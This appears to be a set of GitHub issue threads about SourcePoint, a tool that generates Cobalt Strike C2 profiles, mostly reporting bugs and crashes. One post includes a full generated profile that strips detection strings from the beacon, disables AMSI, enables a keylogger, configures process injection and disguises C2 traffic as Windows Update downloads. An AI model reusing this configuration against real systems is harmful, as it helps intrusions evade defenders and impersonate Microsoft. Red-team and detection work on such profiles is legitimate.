Hello, i am getting an http-get.client.metadata error.

Invalid session id
[-] A Malleable C2 attempt to recover data from a '.http-get.client.metadata' transaction failed. This could be due to a bug in the profile, a change made to the profile after this Beacon was run, or a change made to the transaction by some device between your target and your Cobalt Strike controller. The following information will (hopefully) help narrow down what happened.

Error

From '15.158.36.55'
URI '/safebrowsing/8ijb3/793g0INlUAzvUkU'**

Headers

'REMOTE_ADDRESS' = '/xx.xx.xx.xx'
'Accept' = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8'
'CloudFront-Viewer-Country' = 'XX'
'CloudFront-Is-Tablet-Viewer' = 'false'
'CloudFront-Forwarded-Proto' = 'https'
'User-Agent' = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0'
'Connection' = 'Keep-Alive'
'Referer' = 'http://www.google.test'
'CloudFront-Is-Mobile-Viewer' = 'false'
'CloudFront-Is-SmartTV-Viewer' = 'false'
'Host' = 'd2mhkyo3wllxj8.cloudfront.net'
'Pragma' = 'no-cache'
'Via' = '1.1 xx.cloudfront.net (CloudFront)'
'Cache-Control' = 'no-cache'
'X-Amz-Cf-Id' = 'rQYhM_G34ARassaddsasdsadssadasadsddasdsadssadgK6lISasHqmV9xVCxxasxQ=='
'X-Forwarded-For' = 'x.x.x.x'
'CloudFront-Viewer-ASN' = '4657'
'CloudFront-Is-Desktop-Viewer' = 'true'

This is my command to generate the sourcepoint profile
./SourcePoint -Outfile test2.profile -Host xxx.cloudfront.net -Injector NtMapViewOfSection -Profile 5 -Password abcd! -Keystore a123.abc.cf.store

Anyone has experience in troubleshooting this as i have been trying to troubleshoot this but to no avail ):

Thanks in advance!

This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.

Generating Profile:

┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
└─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

       _____                            ____        _       __ 
      / ___/____  __  _______________  / __ \____  (_)___  / /_
      \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
     ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
    /____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
                                                    (@Tyl0us)

[] Preparing Varibles...
[] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[] Post-Ex Process Name: gpupdate.exe
[] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking

Starting CS says

┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
└─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. ./teststage2.profile loaded.
[] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
[!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is:

Output from teststage2.profile

set host_stage "True";
set sleeptime "44000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";

set data_jitter "50";
set smb_frame_header "";
set pipename "plugplay+3850";
set pipename_stager "plugplay+1395";

set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "plugplay+##";

####Manaully add these if your doing C2 over DNS (Future Release)####
##dns-beacon {

set dns_idle "1.2.3.4";

set dns_max_txt "199";

set dns_sleep "1";

set dns_ttl "5";

set maxdns "200";

set dns_stager_prepend "doc-stg-prepend";

set dns_stager_subhost "doc-stg-sh.";

set beacon "doc.bc.";

set get_A "doc.1a.";

set get_AAAA "doc.4a.";

set get_TXT "doc.tx.";

set put_metadata "doc.md.";

set put_output "doc.po.";

set ns_response "zero";

#}

stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";

#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";

set checksum "0";
set compile_time "05 Jun 2028 09:16:06";
set entry_point "229200";
set image_size_x86 "397312";
set image_size_x64 "397312";
set name "Windows.System.Diagnostics.dll";
set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";

transform-x86 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";

	}

transform-x64 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "beacon.x64.dll" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";
	}

}

process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";

# shape the content and properties of what we will inject
set min_alloc "9457";
set userwx    "false";
set startrwx "true";

transform-x86 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

transform-x64 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

# specify how we execute code in the remote process
execute {
	CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
    NtQueueApcThread-s;
    SetThreadContext;
    CreateRemoteThread;
	CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
    RtlCreateUserThread;
}

}

post-ex {
# control the temporary process we spawn to

set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
set spawnto_x64 "%windir%\sysnative\gpupdate.exe";

# change the permissions and content of our post-ex DLLs
set obfuscate "true";

# pass key function pointers from Beacon to its child jobs
set smartinject "true";

# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";

# control the method used to log keystrokes 
set keylogger "SetWindowsHookEx";

}

http-get {
set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";

client {

header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";

metadata {
	base64url;
	append ".cab";
	uri-append;
}

}

server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";

output {

	print;
}

}
}

http-post {
set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";

set verb "GET";

client {

header "Accept" "*/*";


id {
	prepend "download.windowsupdate.com/c/";
	header "Host";
}


output {
	base64url;
	append ".cab";
	uri-append;
}

}

server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";

output {
	print;
}

}
}

http-stager {
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
}
}

https-certificate {
set CN "0012eb.lwindowsupdate.com"; #Common Name
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "Microsoft IT"; #Organizational Unit Name
set ST "WA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}

One of the string replace options kills the functionality of powershell-import.

Prior to running powershell-import, powerpick works fine. After importing Powerview, powerpick shows this error on any command (notice the simple whoami, it doesn't recognize any imported commands at all):

I deleted all of the strrep lines in both x86 and x64 and both powershell-import and powerpick worked as intended.

Before I split the strreps into chunks to find the bad one (or couple), any ideas?

Everything works great, I love this tool. The only issue is that when you don't specify a keystore for the certificate, the header for the section of "https-certificate" isn't written to the final profile.

The following command:
SourcePoint -Injector VirtualAllocEx -Jitter 21 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 17 -Outfile deez.profile -Host www.bing.com -Profile 2

Results in the following last 20 lines of the profile

$ tail -20 deez.profile

header "Cache-Control" "private, no-cache, no-store, must-revalidate";
header "X-Frame-Options" "SAMEORIGIN";
header "Vary" "Accept-Encoding";
header "X-Via" "haproxy-www-suhx";

}


}


set CN       "www.bing.com"; #Common Name
set O        "Slack Technologies Inc"; #Organization Name
set C        "US"; #Country
set L        "San Francisco"; #Locality
set OU       "DigiCert Inc"; #Organizational Unit Name
set ST       "CA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
        %

Note, right about set CN there is no https-certificate { as there should be

when i generate new profile, it uses escape character '\' for the magic_mz_x64 that causes c2lint errors.
I can regenerate or change it manually and works fine, no big deal.

error:

[-] Error(s) while compiling /opt/my.profile
Error: unknown escape \A at line 58
       A\AT
         ^
[-] exiting because of errors in /opt/my.profile. Use ./c2lint to check the file

string in my profile:

set magic_mz_x64 "A\AT";

The project (when i used it) creates a valid c2 profile execpt that the http.get and http.post sections for the uri forget a '/' char and add a space at the end(which is not a bug just odd)

for example:

Example Currently being generated by profile:
uri "sdfghjk "

Example of what I did to fix it on the test generated profile:
uri "/sdfghjk"

this causes beacon to never check in properly with the coded http c2 method for the profile i generated. This can be observed in the web log

Awesome project! Do you think you could add an additional option to set trust_x_forwarded_for in the http-config block for when using HTTP redirectors?

http-config{
    set trust_x_forwarded_for "true";
}

🐛 Summary

There are 30 options for the PE_Clone, the last one being umppc.dll. When trying to specify #30, an error is thrown. This error comes from Loader.go

To reproduce

1. Run SourcePoint with the parameter -PE_Clone 30

Any helpful log output or screenshots

[*] Preparing Varibles...
2022/07/08 15:49:17 Error: Please provide a valid PE number less the 31 option

Add any screenshots of the problem here.

🐛 Summary

Line 93 of Loader/Loader.go uses PE[5] to reference the 5th element from the Beacon_Stage_p2 that is generated. 2/30 of the options in Struct/Struct.go do not have the image_size variables, so this line will reference the incorrect variable 1/15 times, or when specifying CyMemDef64.dll (27) or umppc.dll (30) as PE_Clone. The actual error is thrown on line 94 of Loader/Loader.go when printing the name after splitting by ".

To reproduce

1. This error can be reproduced by running the code with -PE_Clone 27 or -PE_Clone 30

Any helpful log output or screenshots

[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
        /tools/SourcePoint/Loader/Loader.go:94 +0x993
main.main()
        /tools/SourcePoint/SourcePoint.go:252 +0xd11

Below is a screenshot of the error that is thrown:

can we see the profile you use :D

thank you

Does anyone encounter this problem? My CS version is 4.5

[-] Error(s) while compiling /root/Downloads/edu.profile
Error: invalid option for at line 8
tasks_max_size
Error: invalid option for at line 9
tasks_proxy_max_size
Error: invalid option for at line 10
tasks_dns_proxy_max_size
[-] Unable to load the Beacon profile
/root/Downloads/edu.profile

i use this 2 command :

./SourcePoint -Injector NtMapViewOfSection -Host {SECRET.IP} -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

[] Preparing Varibles...
[!] Self Signed SSL Cerificate Used
[] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[] Beacon DLL Spoofed To: srvcli.dll
[] Post-Ex Process Name: mcbuilder.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking

./SourcePoint -Outfile out.profile -Host {SECRET.IP} -Injector NtMapViewOfSection
[] Preparing Varibles...
[] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[] Beacon DLL Spoofed To: GPSVC.dll
[] Post-Ex Process Name: pcaui.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile:
[+] Profile Generated: strannik2.profile
[+] Happy Hacking

• Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
  Is normal?

and the exe is detected

Hi,
great project!
When i generate profile, i get errors some of the times and other times profile generated successfully:

installing SourcePoint:

    git clone https://github.com/Tylous/SourcePoint
    cd SourcePoint
    go get gopkg.in/yaml.v2
    go build SourcePoint.go

golang

sudo snap install go --classic
go version go1.21.4 linux/amd64

creating profile

root@c2:/opt# cat /opt/sourcepoint.yml
Outfile: "random.profile"
Host: "fixme.cloudfront.net"
Stage: False
Injector: "VirtualAllocEx"
Forwarder: True
Useragent: "Win10"
Syscall: "Direct"


generating profile - 2 attempts failed and successful 3rd 

cd /opt
SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[*] Preparing Varibles...
panic: runtime error: index out of range [44] with length 36

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Utils.GenerateSingleValue(0x2)
/opt/SourcePoint/Utils/Utils.go:94 +0x8b
github.com/Tylous/SourcePoint/Loader.GeneratePE({0x0, 0x0}, {0x0, 0x0})
/opt/SourcePoint/Loader/Loader.go:350 +0x30f
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, }, {, }, {, }, {, _}, {0x0, 0x0}, ...)
/opt/SourcePoint/Loader/Loader.go:86 +0x3eb
main.main()
/opt/SourcePoint/SourcePoint.go:269 +0xdd3

root@c2:/opt# SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[*] Preparing Varibles...
panic: runtime error: index out of range [41] with length 36

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Utils.GenerateSingleValue(0x2)
/opt/SourcePoint/Utils/Utils.go:94 +0x8b
github.com/Tylous/SourcePoint/Loader.GeneratePE({0x0, 0x0}, {0x0, 0x0})
/opt/SourcePoint/Loader/Loader.go:350 +0x30f
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, }, {, }, {, }, {, _}, {0x0, 0x0}, ...)
/opt/SourcePoint/Loader/Loader.go:86 +0x3eb
main.main()
/opt/SourcePoint/SourcePoint.go:269 +0xdd3

root@c2:/opt# SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[] Preparing Varibles...
[] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[] Beacon DLL Spoofed To: BingMaps.dll
[] Post-Ex Process Name: dtdump.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] syscall method selected
[*] Seleted Profile:
[+] Profile Generated: random.profile
[+] Happy Hacking